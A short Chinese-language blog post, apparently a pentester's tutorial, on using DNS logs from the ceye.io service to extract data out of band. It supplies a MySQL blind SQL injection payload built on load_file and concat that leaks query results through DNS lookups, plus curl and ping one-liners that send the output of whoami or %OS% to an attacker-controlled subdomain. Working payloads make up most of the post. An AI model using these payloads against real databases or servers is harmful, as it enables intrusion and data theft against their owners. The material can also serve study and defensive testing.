Posts Tags Categories Links About

Contents

利用 dnslog 回显

X1r0z  included in  category Web安全
     63 words   One minute 
Contents

DNS 在解析的时候会留下日志, 通过读取多级域名的解析日志, 来获取信息

简单来说就是把信息放在二级域名中, 传递到自己这, 然后读取日志, 获取信息

利用 dnslog 可以回显 sql 盲注的数据、命令执行的结果等

知道创宇的 dnslog 平台

ceye.io

登录之后 右上角 Profile

http://exp10it-1252109039.cossh.myqcloud.com/2018/02/06/1517915368.jpg

Identifier 就是 dnslog 测试地址

访问 test.xxxx.ceye.io

http://exp10it-1252109039.cossh.myqcloud.com/2018/02/06/1517915418.jpg

后台 dnslog 记录

http://exp10it-1252109039.cossh.myqcloud.com/2018/02/06/1517915447.jpg

SQL 盲注

以 mysql 为例

load_file('\\\\xxxx.com\\')

可以发起网络请求

http://exp10it-1252109039.cossh.myqcloud.com/2018/02/06/1517915501.jpg

记录

http://exp10it-1252109039.cossh.myqcloud.com/2018/02/06/1517915511.jpg

盲注

and if((select load_file(concat('\\\\',(PAYLOAD),'.xxoo.ceye.io\\abc'))),1,1)

因为不能直接 id=1 and select xxx 就用 if 来执行

PAYLOAD 记得写上 limit

命令执行

执行反引号内的内容并作为结果输出

curl [反引号]whoami[反引号].xxxx.ceye.io

ping [反引号]whoami[反引号].xxxx.ceye.io

http://exp10it-1252109039.cossh.myqcloud.com/2018/02/06/1517915697.jpg

dnslog

http://exp10it-1252109039.cossh.myqcloud.com/2018/02/06/1517915704.jpg

感觉鸡肋啊…

ping %OS%.xxoo.ceye.io

%OS% 操作系统名称

Updated on 2018-02-10
Read markdown
 dnslog
Back | Home